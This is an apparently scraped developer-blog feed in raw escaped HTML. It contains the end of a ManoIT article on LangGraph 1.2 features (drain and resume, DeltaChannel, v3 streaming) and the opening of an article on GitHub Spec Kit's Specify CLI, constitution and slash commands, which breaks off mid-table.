&lt;span class="n"&gt;config&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;configurable&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;thread_id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;order-42&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;run_control&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;run_control&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="n"&gt;graph&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;ainvoke&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;inputs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;config&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;config&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="n"&gt;GraphDrained&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# checkpoint already saved -&amp;gt; resume with the same config on the next pod
&lt;/span&gt;    &lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;drained; will resume from last checkpoint on next pod&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This breaks the "deploy = work loss" equation. A new pod resuming with the same &lt;code&gt;thread_id&lt;/code&gt; picks up right after the superstep where the drain happened.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. DeltaChannel — cut long-thread checkpoint cost to increments
&lt;/h2&gt;

&lt;p&gt;A normal channel &lt;strong&gt;re-serializes the full accumulated value&lt;/strong&gt; on every step. For channels that grow over time — like a message list — checkpoint write cost balloons in proportion to thread length. &lt;strong&gt;&lt;code&gt;DeltaChannel&lt;/code&gt; (beta)&lt;/strong&gt; stores &lt;strong&gt;only the incremental delta&lt;/strong&gt; per step to cut that overhead. Since pure deltas would make reads expensive to reconstruct, &lt;code&gt;snapshot_frequency=K&lt;/code&gt; writes a &lt;strong&gt;full snapshot every K steps&lt;/strong&gt; to keep read latency bounded.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;typing&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Annotated&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;langgraph.channels&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;DeltaChannel&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;langgraph.graph.message&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;add_messages&lt;/span&gt;

&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;AgentState&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;TypedDict&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="c1"&gt;# DeltaChannel on a long-growing message channel
&lt;/span&gt;    &lt;span class="c1"&gt;# full snapshot every 5 steps -&amp;gt; lower write cost, bounded read latency
&lt;/span&gt;    &lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;Annotated&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nc"&gt;DeltaChannel&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;add_messages&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;snapshot_frequency&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;Default channel&lt;/th&gt;
&lt;th&gt;DeltaChannel (beta)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Per-step serialization&lt;/td&gt;
&lt;td&gt;Re-serialize full value&lt;/td&gt;
&lt;td&gt;Store delta only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Write cost&lt;/td&gt;
&lt;td&gt;Grows with thread length&lt;/td&gt;
&lt;td&gt;Converges to ~constant&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Read latency&lt;/td&gt;
&lt;td&gt;Low (full value on hand)&lt;/td&gt;
&lt;td&gt;Bounded via &lt;code&gt;snapshot_frequency&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Best for&lt;/td&gt;
&lt;td&gt;Small, rarely-changing channels&lt;/td&gt;
&lt;td&gt;Long, large channels (message lists)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  6. Streaming API v3 — content-block-centric, typed projections
&lt;/h2&gt;

&lt;p&gt;Streaming chunk shapes used to differ per mode, making UI integration awkward. 1.2's new event streaming API activates when you pass &lt;strong&gt;&lt;code&gt;version="v3"&lt;/code&gt;&lt;/strong&gt; to &lt;code&gt;stream_events()&lt;/code&gt; / &lt;code&gt;astream_events()&lt;/code&gt;, offering a &lt;strong&gt;content-block-centric protocol&lt;/strong&gt; with &lt;strong&gt;typed, per-channel projections&lt;/strong&gt;. The four first-class projections are &lt;code&gt;run.values&lt;/code&gt;, &lt;code&gt;run.messages&lt;/code&gt;, &lt;code&gt;run.lifecycle&lt;/code&gt;, and &lt;code&gt;run.subgraphs&lt;/code&gt;, plus opt-in transformers for updates, custom events, checkpoints, tasks, and debug. Notably, &lt;code&gt;run.messages&lt;/code&gt; yields &lt;strong&gt;one &lt;code&gt;ChatModelStream&lt;/code&gt; per LLM call&lt;/strong&gt;, with typed sub-projections for text, reasoning, tool calls, and usage. &lt;code&gt;version="v1"&lt;/code&gt; and &lt;code&gt;"v2"&lt;/code&gt; are unchanged, so migration is gradual.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# content-block-centric streaming — run.messages is one ChatModelStream per LLM call
&lt;/span&gt;&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;graph&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;astream_events&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;inputs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;config&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;version&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;v3&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;part&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;run&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;          &lt;span class="c1"&gt;# ChatModelStream
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;        &lt;span class="nf"&gt;yield_to_ui&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;        &lt;span class="c1"&gt;# body text
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;reasoning&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;   &lt;span class="nf"&gt;debug&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;reasoning&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;         &lt;span class="c1"&gt;# reasoning trace
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tool_calls&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="nf"&gt;trace_tools&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tool_calls&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# tool calls
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;usage&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;       &lt;span class="nf"&gt;meter&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;part&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;usage&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;             &lt;span class="c1"&gt;# token usage / cost
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Projection&lt;/th&gt;
&lt;th&gt;Content&lt;/th&gt;
&lt;th&gt;Typical use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;run.values&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Current graph state values&lt;/td&gt;
&lt;td&gt;Render final/intermediate state&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;run.messages&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;One &lt;code&gt;ChatModelStream&lt;/code&gt; per LLM call&lt;/td&gt;
&lt;td&gt;Token streaming UI, cost metering&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;run.lifecycle&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Node start/end lifecycle events&lt;/td&gt;
&lt;td&gt;Progress, observability&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;run.subgraphs&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Per-subgraph events&lt;/td&gt;
&lt;td&gt;Multi-agent / nested graph tracing&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  7. The ecosystem — langchain 1.3 and deepagents 0.6 shipped the same day
&lt;/h2&gt;

&lt;p&gt;1.2 didn't ship alone. On the same day, May 12, 2026, &lt;strong&gt;langchain v1.3.0&lt;/strong&gt; added &lt;code&gt;version="v3"&lt;/code&gt; support in &lt;code&gt;stream_events()&lt;/code&gt; / &lt;code&gt;astream_events()&lt;/code&gt; for &lt;code&gt;create_agent&lt;/code&gt;-based agents, and &lt;strong&gt;deepagents v0.6.0&lt;/strong&gt; added (1) an experimental &lt;code&gt;CodeInterpreterMiddleware&lt;/code&gt; that enables code execution and programmatic tool calling through a scoped &lt;strong&gt;QuickJS runtime&lt;/strong&gt;, and (2) the same &lt;code&gt;version="v3"&lt;/code&gt; streaming support. So v3 streaming is aligned across the LangGraph runtime, the LangChain agent layer, and Deep Agents at once — whichever layer you start from, you consume the &lt;strong&gt;same content-block protocol&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  8. ManoIT internal adoption checklist
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Task&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done criteria&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Pin to &lt;code&gt;langgraph&lt;/code&gt; 1.2.0 / &lt;code&gt;langchain&lt;/code&gt; 1.3.0 (confirm no breaking changes)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Lockfile + CI green&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Convert external tool/LLM nodes to async (timeout prerequisite)&lt;/td&gt;
&lt;td&gt;Domain owners&lt;/td&gt;
&lt;td&gt;100% target nodes async&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;run_timeout&lt;/code&gt; on tool nodes, &lt;code&gt;idle_timeout&lt;/code&gt; on streaming nodes&lt;/td&gt;
&lt;td&gt;Domain owners&lt;/td&gt;
&lt;td&gt;0 infinite waits (load test)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;error_handler&lt;/code&gt; + compensation node on irreversible steps (payment, booking)&lt;/td&gt;
&lt;td&gt;Backend&lt;/td&gt;
&lt;td&gt;Auto-rollback on fault injection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Wire SIGTERM -&amp;gt; &lt;code&gt;request_drain()&lt;/code&gt;, verify resume&lt;/td&gt;
&lt;td&gt;SRE&lt;/td&gt;
&lt;td&gt;0 work loss during rolling deploy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Apply/tune &lt;code&gt;DeltaChannel(snapshot_frequency=K)&lt;/code&gt; on long channels&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Lower checkpoint p99 write time&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Migrate stream consumption to &lt;code&gt;version="v3"&lt;/code&gt; (run v2 in parallel)&lt;/td&gt;
&lt;td&gt;Frontend/BFF&lt;/td&gt;
&lt;td&gt;Unified token UI + usage metering&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;PoC deepagents &lt;code&gt;CodeInterpreterMiddleware&lt;/code&gt; (sandbox isolation)&lt;/td&gt;
&lt;td&gt;AI team&lt;/td&gt;
&lt;td&gt;QuickJS isolation + resource limits verified&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  9. Conclusion — "an agent isn't a function; it's a durable graph that dies and revives per node"
&lt;/h2&gt;

&lt;p&gt;In one line, LangGraph 1.2 is &lt;strong&gt;"the release that pushed fault tolerance down from the whole graph to individual nodes, finally lifting agent execution into truly operable durable execution."&lt;/strong&gt; &lt;code&gt;run_timeout&lt;/code&gt;/&lt;code&gt;idle_timeout&lt;/code&gt; separate "infinite wait" from "legitimately long response," &lt;code&gt;error_handler&lt;/code&gt; folds post-failure compensation into the graph topology, and &lt;code&gt;request_drain()&lt;/code&gt; turns deploys into work-loss-free events. &lt;code&gt;DeltaChannel&lt;/code&gt; tackles long-thread checkpoint cost, and Streaming v3 cleans up the previously inconsistent stream shapes.&lt;/p&gt;

&lt;p&gt;Three operational recommendations to close. (1) &lt;strong&gt;Make nodes async before adopting timeouts&lt;/strong&gt; — timeouts are async/Python-only, so without this prerequisite they're inert. (2) &lt;strong&gt;Always pair irreversible steps with a compensation node&lt;/strong&gt; — piling on retries without an &lt;code&gt;error_handler&lt;/code&gt; just turns "graph explodes after 3 failures" into a production incident. (3) &lt;strong&gt;Wire &lt;code&gt;request_drain()&lt;/code&gt; into your deploy pipeline first&lt;/strong&gt; — it's the smallest change that buys the most stability. The shortest one-liner: &lt;em&gt;this sprint, attach a &lt;code&gt;TimeoutPolicy&lt;/code&gt; and an &lt;code&gt;error_handler&lt;/code&gt; to your single most stall-prone tool node, wire a drain into rolling deploys, and measure zero work loss.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was produced by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), analyzing the official LangChain changelog (docs.langchain.com — langgraph v1.2.0 / langchain v1.3.0 / deepagents v0.6.0, May 12, 2026 entries), the langchain-ai/langgraph GitHub Releases, and the LangGraph durable execution / persistence / human-in-the-loop docs as primary sources. API names, signatures, and behaviors reflect the official changelog as of publication (2026-06-01); &lt;code&gt;DeltaChannel&lt;/code&gt; and v3 streaming are explicitly beta and may change. Code samples are illustrative, based on documented signatures — verify the latest API and beta status on docs.langchain.com and GitHub Releases before production use. Timeouts and error handlers are Python-only; timeouts work on async nodes only.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1481956" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>llm</category>
      <category>machinelearning</category>
      <category>agents</category>
    </item>
    <item>
      <title>GitHub Spec Kit Deep Dive — Spec-Driven Development, the Constitution, /speckit.* Slash Commands, and the Specify CLI for Taming AI Coding Agents</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Sun, 31 May 2026 13:03:24 +0000</pubDate>
      <link>https://dev.to/x4nent/github-spec-kit-deep-dive-spec-driven-development-the-constitution-speckit-slash-commands-1m71</link>
      <guid>https://dev.to/x4nent/github-spec-kit-deep-dive-spec-driven-development-the-constitution-speckit-slash-commands-1m71</guid>
      <description>&lt;p&gt;As AI coding agents become routine, the most common failure mode is &lt;em&gt;vibe coding&lt;/em&gt;: you start with a one-line prompt and the code itself silently becomes the spec. Code is inherently a &lt;strong&gt;binding artifact&lt;/strong&gt; — once an implementation is locked in, every shifting requirement triggers expensive rework. &lt;strong&gt;GitHub Spec Kit&lt;/strong&gt; flips this on its head. Instead of treating specifications as throwaway scaffolding you discard once "real coding" begins, it promotes the specification to a &lt;strong&gt;first-class, executable artifact&lt;/strong&gt; — the heart of &lt;strong&gt;Spec-Driven Development (SDD)&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Open-sourced by GitHub in September 2025, Spec Kit has grown into the most widely adopted SDD tool as of May 2026, with 90k+ stars and 8k+ forks. Its official docs were last updated on May 27, 2026, and it now supports 30+ coding agents. This guide breaks down the &lt;code&gt;Constitution&lt;/code&gt;, the &lt;code&gt;/speckit.*&lt;/code&gt; slash commands, and the &lt;code&gt;Specify CLI&lt;/code&gt; from an operations and architecture lens — plus the rollout checklist ManoIT used internally.&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why Spec-Driven Development in 2026
&lt;/h2&gt;

&lt;p&gt;As Microsoft's developer blog puts it, SDD is &lt;em&gt;not&lt;/em&gt; about long requirement docs nobody reads, and it's not a return to waterfall. The point is to make technical decisions &lt;strong&gt;explicit, reviewable, and evolvable&lt;/strong&gt; — "version control for your thinking." If three sprints into a notification system the PM assumed per-channel toggles, the backend built a single on/off switch, and the frontend wired up OS notifications, that's not a communication failure — it's a &lt;strong&gt;missing shared context&lt;/strong&gt;. SDD surfaces those assumptions when changing direction costs a few keystrokes, not entire sprints.&lt;/p&gt;

&lt;p&gt;This matters even more with AI agents. Because the spec lives &lt;em&gt;outside&lt;/em&gt; the code, you can generate a Rust and a Go variant from the same spec to compare performance, or explore multiple design directions in parallel — &lt;strong&gt;multi-variant implementation&lt;/strong&gt;. The spec becomes the asset that steers the agent toward the right solution.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;Traditional / Vibe Coding&lt;/th&gt;
&lt;th&gt;Spec-Driven Development&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Primary artifact&lt;/td&gt;
&lt;td&gt;Code (spec is scaffolding, discarded)&lt;/td&gt;
&lt;td&gt;Spec (executable, generates code)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Requirement negotiation&lt;/td&gt;
&lt;td&gt;Negotiated in code → costly rework&lt;/td&gt;
&lt;td&gt;Negotiated in Markdown → a few keystrokes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Decision record&lt;/td&gt;
&lt;td&gt;Email, someone's head, scattered docs&lt;/td&gt;
&lt;td&gt;Version-controlled spec / plan / constitution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI agents&lt;/td&gt;
&lt;td&gt;One-shot prompt, unpredictable result&lt;/td&gt;
&lt;td&gt;Multi-step refinement, steered by shared context&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Tool lock-in&lt;/td&gt;
&lt;td&gt;Bound to agent / IDE&lt;/td&gt;
&lt;td&gt;30+ swappable agents, spec stays constant&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  2. Specify CLI — install and bootstrap
&lt;/h2&gt;

&lt;p&gt;Spec Kit has two pillars: (1) the &lt;strong&gt;Specify CLI&lt;/strong&gt; (Python-based, MIT-licensed, package &lt;code&gt;specify-cli&lt;/code&gt;) that scaffolds a project for SDD, and (2) a bundle of &lt;strong&gt;templates and helper scripts&lt;/strong&gt; defining what a spec, plan, and task list look like. There is no magic beyond these two parts. Prerequisites:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Linux / macOS / Windows (native or WSL)&lt;/li&gt;
&lt;li&gt;A supported AI coding agent (Copilot, Claude, Gemini, Codex, Cursor, Windsurf, and 30+ others)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;uv&lt;/code&gt; (recommended) or &lt;code&gt;pipx&lt;/code&gt; for persistent install · Python 3.11+ · Git
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Persistent install (recommended) — replace vX.Y.Z with the latest Releases tag&lt;/span&gt;
uv tool &lt;span class="nb"&gt;install &lt;/span&gt;specify-cli &lt;span class="nt"&gt;--from&lt;/span&gt; git+https://github.com/github/spec-kit.git@vX.Y.Z

&lt;span class="c"&gt;# Or bootstrap directly with a one-off run (uvx)&lt;/span&gt;
uvx &lt;span class="nt"&gt;--from&lt;/span&gt; git+https://github.com/github/spec-kit.git specify init my-project

&lt;span class="c"&gt;# Initialize a project and pick your agent&lt;/span&gt;
specify init my-project &lt;span class="nt"&gt;--integration&lt;/span&gt; copilot
&lt;span class="nb"&gt;cd &lt;/span&gt;my-project

&lt;span class="c"&gt;# List integrations available in your installed version&lt;/span&gt;
specify integration list
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Initialization creates a &lt;code&gt;.specify/&lt;/code&gt; folder plus an agent-specific folder (e.g. &lt;code&gt;.github/&lt;/code&gt; for Copilot). &lt;code&gt;.specify&lt;/code&gt; holds the spec/plan/tasks templates and the scripts for your platform (bash for POSIX, PowerShell for native Windows). And one file you may not have seen before — &lt;code&gt;memory/constitution.md&lt;/code&gt; — is the keystone.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Structure created after `specify init` (abridged)&lt;/span&gt;
my-project/
├── .github/                      &lt;span class="c"&gt;# agent-specific: slash-command prompt definitions&lt;/span&gt;
│   └── prompts/
│       ├── specify.prompt.md
│       ├── plan.prompt.md
│       └── tasks.prompt.md
└── .specify/
    ├── memory/
    │   └── constitution.md       &lt;span class="c"&gt;# non-negotiable principles (project constitution)&lt;/span&gt;
    ├── scripts/                  &lt;span class="c"&gt;# bash or powershell helpers&lt;/span&gt;
    └── templates/                &lt;span class="c"&gt;# spec / plan / tasks / agent-file templates&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;On init, Specify ensures you're inside a Git repository (creating one if needed). The helper scripts then force all work onto the &lt;strong&gt;same feature branch&lt;/strong&gt; and keep subsequent prompts correctly referencing the spec, plan, and data contracts created earlier.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. The Constitution — lock non-negotiables before any code
&lt;/h2&gt;

&lt;p&gt;In SDD, the &lt;strong&gt;Constitution&lt;/strong&gt; captures a project's &lt;em&gt;non-negotiable principles&lt;/em&gt;: "web apps always follow this testing approach," "every app this team builds is CLI-first," and so on — pinned down &lt;strong&gt;before any SDD iteration begins&lt;/strong&gt;. This is how organizations establish an &lt;strong&gt;opinionated stack&lt;/strong&gt; that guides every new and existing project.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Run your agent in the project dir, then first of all:&lt;/span&gt;
/speckit.constitution Create principles focused on code quality, testing standards, user experience consistency, and performance requirements
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This creates or updates &lt;code&gt;.specify/memory/constitution.md&lt;/code&gt;, which the agent references during the &lt;code&gt;specify&lt;/code&gt;, &lt;code&gt;plan&lt;/code&gt;, and &lt;code&gt;implement&lt;/code&gt; phases. The constitution isn't just a doc — it's a &lt;strong&gt;guardrail that binds every subsequent step&lt;/strong&gt;. The plan produced by &lt;code&gt;/speckit.plan&lt;/code&gt; is grounded by the constitution, suppressing decisions that violate your conventions.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. The core workflow — /speckit.* slash commands
&lt;/h2&gt;

&lt;p&gt;At launch, Spec Kit started with three commands (&lt;code&gt;/specify&lt;/code&gt;, &lt;code&gt;/plan&lt;/code&gt;, &lt;code&gt;/tasks&lt;/code&gt;). As of 2026 they've settled into a namespaced &lt;code&gt;/speckit.*&lt;/code&gt; scheme (Codex CLI in skills mode uses &lt;code&gt;$speckit-*&lt;/code&gt;). In one line the flow is &lt;strong&gt;Spec → Plan → Tasks → Implement&lt;/strong&gt;, with the constitution and quality gates wrapped above and below.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 Core commands
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Command&lt;/th&gt;
&lt;th&gt;Agent skill&lt;/th&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
